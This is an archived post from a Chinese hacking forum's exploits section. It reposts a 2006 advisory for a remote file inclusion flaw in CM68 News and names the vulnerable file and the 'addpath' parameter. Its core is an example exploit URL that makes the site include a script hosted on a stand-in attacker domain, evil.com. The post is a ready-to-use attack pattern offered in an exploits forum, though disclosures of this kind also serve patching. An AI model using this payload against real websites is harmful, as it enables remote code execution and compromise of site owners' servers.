邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability [查看完整版本]

pub!1c 2006-12-9 11:59

CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability

<p>[code]</p><pre>Vulnerable Software:cm68news
Vulnerable file: /engine/oldnews.inc.php
Credits: Paul Bakoyiannis
Vulnerable Variable: addpath
Example Exploit: [url]http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?&[/url]

</pre><p>[/code]</p>

查看完整版本: CM68 News &lt;= 12.02.06 (addpth) Remote File Inclusion Vulnerability

© 1999-2008 EvilOctal Security Team